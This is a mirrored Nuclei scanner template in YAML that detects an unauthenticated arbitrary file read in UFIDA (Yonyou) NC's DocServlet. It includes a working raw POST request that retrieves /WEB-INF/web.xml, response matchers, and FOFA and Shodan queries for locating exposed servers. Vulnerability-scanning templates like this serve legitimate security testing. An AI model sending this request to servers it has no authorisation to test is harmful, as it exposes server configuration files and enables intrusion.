mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 15:53:33 +08:00
36 lines
1.5 KiB
YAML
36 lines
1.5 KiB
YAML
id: yonyou-nc-lfi
|
|
|
|
info:
|
|
name: UFIDA NC - Arbitrary File Read
|
|
author: vva
|
|
severity: high
|
|
description: |
|
|
UFIDA NC is vulnerable to an arbitrary file read vulnerability in the nc.uap.lfw.file.action.DocServlet component. An unauthenticated remote attacker can exploit this flaw to read sensitive files on the server by sending crafted requests.
|
|
impact: |
|
|
Successful exploitation allows attackers to access sensitive files and information stored on the server.
|
|
reference:
|
|
- https://github.com/szjr123/Target-practice/blob/05ed667090d8040a09235826f7698ff5347a93cf/%E7%94%A8%E5%8F%8BOA/NC%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96_DocServlet/yongyou_read.py
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: 'app="用友-UFIDA-NC"'
|
|
shodan-query: 'http.title:"用友" "NC"'
|
|
tags: yonyou,ufida,lfi
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /service/~webrt/nc.uap.lfw.file.action.DocServlet HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
pageId=login&disp=/WEB-INF/web.xml
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "application/xml")'
|
|
- 'contains_all(body, "<web-app", "<?xml version")'
|
|
condition: and
|
|
# digest: 4a0a004730450220353a2fd31e57e130ac664b6096f59fc396f75d59571cc90a763748efbb24cfbf022100fc79c4d5fc75a9ba204757b33bc4fb5848d413182d7e0cf9702f8b83d4b814d8:922c64590222798bb761d5b6d8e72950 |